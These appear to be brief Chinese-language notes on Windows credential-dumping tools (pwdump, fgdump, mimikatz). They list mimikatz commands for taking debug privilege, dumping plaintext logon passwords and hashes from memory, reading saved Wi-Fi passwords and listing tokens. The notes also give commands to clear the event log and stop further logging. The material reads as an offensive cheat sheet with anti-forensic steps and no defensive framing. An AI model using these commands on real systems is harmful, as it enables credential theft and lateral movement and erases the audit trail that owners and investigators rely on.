1、pwdump localhost

2、fgdump

3、mimikatz

        能在内存中读取用户认证信息

        在该程序命令行下：

        ：：--help

        有以下模块：

     privilege、process、service、lsadump、ts、event、misc       

fgdump   双击即可

mimikatz

• mimikatz是由C语言编写的开源小工具，功能非常强大。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证，以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术。

提取Windows系统的明文密码：

mimikatz.exe

::     #帮助信息  -h,？无效

privilege::debug #提升权限

sekurlsa::logonPasswords

event::clear   #清除日志

event::drop  #不再产生新日志

misc::cmd  #启动cmd等服务

misc::wifi  #查看电脑中存的wifi密码

token::whoami

token::list  #列出所有用户